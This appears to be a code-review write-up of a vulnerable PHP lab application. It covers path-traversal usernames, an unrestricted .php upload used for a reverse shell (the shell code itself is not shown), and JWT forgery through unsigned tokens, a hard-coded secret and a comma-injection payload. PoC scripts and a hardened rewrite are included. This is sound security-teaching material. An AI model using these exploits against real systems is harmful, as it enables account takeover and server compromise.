Beginner Code Review (Part 2)

Broken Authorization for Privilege Escalation

Vulnerabilities used:

  • Lack of input sanitization

Because the registration input is not sanitized, it is possible to register with the username ../files/admin. The application then lists the files belonging to the admin user.
There is no literal “../files/admin” folder under files; the ../ in the username makes the file path resolve to the admin user's folder.

Unrestricted File Upload to Remote Code Execution

Vulnerabilities used:

  • Broken Authorization

Figure 1 — The PHP code to add a file.
Figure 2 — The regex matches .pdf and so allows the PHP file to be uploaded.
It is possible to upload a .php file.
The uploaded PHP file can be accessed without authentication, and the PHP code in it is executed.
I placed a reverse shell in the PHP file and connected to it. The result is access to the host system as www-data.

JSON Web Token Privilege Escalation

Before beginning this walkthrough, here is a quick breakdown of the JWT handling code in jwt.php, which consists of three functions:

  • signature
  • verify
  • parse_json

Exploiting the verify function:

Figure 3 — jwt.php, line 22, verify function.
A JWT without the signature is still accepted.

Exploiting parse_json function:

The parse_json function builds the claims array by splitting the payload string on commas (and each entry on a colon). The sign function applies no sanitization to special characters such as commas and quotes, so they pass straight into the payload.

The parse_json function splits the data on the commas.
The sign function has no sanitization for non-alphanumeric characters.
List of users in the application.
Logging in as test","username:admin and dissecting the token.
The resultant view as user test","username:admin.
It is also possible to enumerate other usernames through the registration functionality.

Proof of concept code for exploiting JWT:

jwtverify.php

<?php
// Checks the token's signature, then decodes and parses the payload.
function verify($auth) {
    list($h64,$d64,$sign) = explode(".",$auth);
    print_r("h64:\t".$h64);
    print_r("\nd64:\t".$d64);
    print_r("\nsign:\t".$sign);
    print_r("\n-----\n");
    // Flaw: the signature is only checked when one is present, so a token
    // with an empty third segment skips verification entirely.
    if (!empty($sign) and (signature($h64.".".$d64) != $sign)) {
        die("Invalid Signature");
    }
    $header = base64_decode($h64);
    $data = base64_decode($d64);
    print_r("header:\t".$header);
    print_r("\ndata:\t".$data);
    print_r("\n......\n");
    return parse_json($data);
}
// Plain sha256 over a hard-coded secret prepended to the data (not an HMAC).
function signature($data) {
    return hash("sha256","donth4ckmebr0".$data);
}
// Hand-rolled JSON parser: strips the braces, then splits on commas and
// colons. A value containing '","' therefore becomes an extra key/value pair.
function parse_json($str) {
    $data = explode(",",rtrim(ltrim($str, '{'), '}'));
    print_r("\n\n---------------\n\n");
    $ret = array();
    foreach($data as $entry) {
        list($key, $value) = explode(":",$entry);
        $key = rtrim(ltrim($key, '"'), '"');
        $value = rtrim(ltrim($value, '"'), '"');
        $ret[$key] = $value;
    }
    return $ret;
}
// Token whose payload decodes to {"username":"test","username:admin",}
print_r(verify("eyJhbGciOiJIUzI1NiIsImlhdCI6MTU4ODE1OTU2MX0.eyJ1c2VybmFtZSI6InRlc3QiLCJ1c2VybmFtZTphZG1pbiIsfQ==.328a0231d16e6a67027132b7a4ce69dc6c3b8c1e865b070d982c5b3921a2ec11"));

jwtcreate.php

<?php
// Builds a token whose payload is the single entry "username:admin", which
// parse_json() splits on the colon into username => admin.
function sign($data) {
    $header = str_replace("=","",base64_encode('{"alg":"HS256","iat":'.time().'}'));
    $token = "{";
    $token .= '"username:admin"';
    $token .= "}";
    $to_sign = $header.".".base64_encode($token);
    // Signed with the same hard-coded secret as the application.
    return $to_sign.".".signature($to_sign);
}
function signature($data) {
    return hash("sha256","donth4ckmebr0".$data);
}
print_r(sign(""));
print_r("\n");
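Hardened counterparts to these three functions, as an added example that is not part of the original post or the reviewed application: the signature becomes a keyed HMAC compared in constant time, an empty signature is rejected instead of skipped, and the payload goes through json_decode so the ","username:admin payload stays one string. The *_hardened names, the JWT_KEY environment variable and the fallback demo key are assumptions.

```php
<?php
// Added example: hardened replacements for verify()/signature()/sign().
// Assumes PHP 7.3+ and a signing key in the JWT_KEY environment variable
// (a constructed fallback key is used so the script runs as-is).

// Keyed HMAC instead of sha256(secret . data); the key lives outside the source.
function signature_hardened(string $data, string $key): string {
    return hash_hmac("sha256", $data, $key);
}
function sign_hardened(array $claims, string $key): string {
    $header  = base64_encode(json_encode(["alg" => "HS256", "iat" => time()]));
    $payload = base64_encode(json_encode($claims)); // quotes and commas are escaped
    $to_sign = $header . "." . $payload;
    return $to_sign . "." . signature_hardened($to_sign, $key);
}
function verify_hardened(string $auth, string $key): array {
    $parts = explode(".", $auth);
    if (count($parts) !== 3) {
        throw new RuntimeException("Malformed token");
    }
    [$h64, $d64, $sign] = $parts;
    // An empty signature is an error, not a reason to skip the check;
    // hash_equals() makes the comparison constant-time.
    if ($sign === "" || !hash_equals(signature_hardened($h64 . "." . $d64, $key), $sign)) {
        throw new RuntimeException("Invalid signature");
    }
    $json = base64_decode($d64, true);
    if ($json === false) {
        throw new RuntimeException("Payload is not base64");
    }
    // A real JSON parser keeps '","username:admin' inside the username string.
    $data = json_decode($json, true, 512, JSON_THROW_ON_ERROR);
    if (!is_array($data)) {
        throw new RuntimeException("Payload is not a JSON object");
    }
    return $data;
}

$key = getenv("JWT_KEY") ?: "constructed-demo-key-change-me";
// The registration payload from the write-up is now a single harmless value.
$token = sign_hardened(["username" => 'test","username:admin'], $key);
var_dump(verify_hardened($token, $key)["username"]);
// The unsigned token that the original verify() accepted is rejected here.
[$h64, $d64] = explode(".", $token);
try {
    verify_hardened($h64 . "." . $d64 . ".", $key);
} catch (RuntimeException $e) {
    echo $e->getMessage(), "\n";
}
```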

What’s next

The next part in this series will cover the methodology I followed to perform the static code analysis.
